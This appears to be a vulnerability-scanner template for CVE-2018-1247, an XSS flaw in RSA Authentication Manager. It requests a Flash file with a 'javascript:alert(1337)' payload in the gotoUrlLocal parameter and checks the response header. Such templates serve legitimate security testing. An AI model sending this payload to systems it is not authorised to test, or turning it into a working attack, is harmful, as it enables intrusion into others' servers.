id: CVE-2018-1247

info:
  name: RSA Authentication Manager XSS
  author: madrobot
  severity: medium 

requests:
  - method: GET
    path:
      - "{{BaseURL}}/IMS-AA-IDP/common/scripts/iua/pmfso.swf?sendUrl=/&gotoUrlLocal=javascript:alert(1337)//"
    matchers:
      - type: word
        words:
          - "application/x-shockwave-flash"
        part: header